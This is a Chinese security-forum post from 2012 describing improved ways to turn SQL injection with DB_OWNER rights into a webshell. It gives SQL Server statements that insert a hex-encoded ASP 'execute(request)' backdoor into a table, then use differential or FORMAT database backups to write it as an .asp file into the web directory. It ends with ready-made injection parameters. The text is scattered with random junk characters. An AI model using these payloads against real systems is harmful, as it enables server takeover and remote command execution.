找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2227|回复: 0
打印 上一主题 下一主题

DB_OWNER权限得到webshell的改进办法

[复制链接]
跳转到指定楼层
楼主
发表于 2012-11-9 21:31:07 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
DB_OWNER权限得到webshell的两点改进:7 h% _% {4 F; p$ Q
% j% I6 [# j3 Q# M# M$ M6 c- L
减少备份文件大小,得到可执行的webshell成功率提高不少* e0 B# {5 T7 w& T4 t0 M: }
一利用差异备份2 U+ r; {7 ^: n& I
加一个参数WITH DIFFERENTIAL
, y6 Z6 y% S+ E1 q
* o6 H. o* R& a! B1
$ c. g0 [; `. e. Z, m5 n2
. s/ F8 t* {3 w3
5 d$ G5 v! ]4 U7 K- Q4* T/ b. C" k% E; b5 r. h  F
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s& {- q6 p  F9 m
create table [dbo].[xiaolu] ([cmd] [image]);
% |4 ]3 `% `" x. [! ^' _) Ainsert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
2 p) c; D5 p5 T5 c! {- e/ Gdeclare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH DIFFERENTIAL
; e0 |) m: W- m4 V9 K" r, K9 \# `- J- X, M, R$ w
二利用完全FORMAT
% J0 w8 f+ c3 \" Z) g加一个参数WITH FROMAT2 O' Z% m" W# H7 `& B
有些页面对数据库要执行几次,而备份又默认是每次都以追加的方式,如果一个注入点对数据库有几次操作,而备份的文件就 几倍的增加,所以
& d) W' b% ?3 ]8 O4 q6 R
1 Q/ d# e2 q9 ?5 M; S, Y+ `& d: V12 {. s3 x" i% m
2% z( i1 V& D1 r% K6 z8 u
3
6 G9 X- `/ \8 |3 J+ f( t  _" M40 A' Z4 o" x- I( Y2 f( |
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s: k, N$ o! I: t, D- ^
create table [dbo].[xiaolu] ([cmd] [image]);2 D: f& C+ p# C3 q. \, O9 [
insert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
1 {3 P  |- ?' s, l, u2 z" i: K+ ]declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH FORMAT + w( b7 a* B. a% g; a: c( r- V( A
* c+ M4 w" r) W( E' ]. q& U: \0 L
总的来说就是那么简单几句,下面以备份数据库model为例子
: B( @9 }0 L/ [" l3 _9 _' p- D1* Z" D/ f) t+ y6 P# ~7 y1 n
$ K! e. P! |& F$ P1 V0 b
1: F, r* m$ Q3 o6 y
id=1;use model create table cmd(str image);insert into cmd(str) values ('<%25execute(request("a"))%25>')
+ L: I0 f4 J! f: N9 v$ ^" y
9 j7 u, f3 B# e9 D" }/ O' N, o; k2$ Q4 y8 Y7 z4 `7 P( A! D

3 ~- {+ w  y- x' E3 b" E1. ?# f# E* v, c1 C" H. q
id=1;backup database model to disk='你的路径‘ with differential,format;-- 2 Z( B4 b8 Y3 p% t# D
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表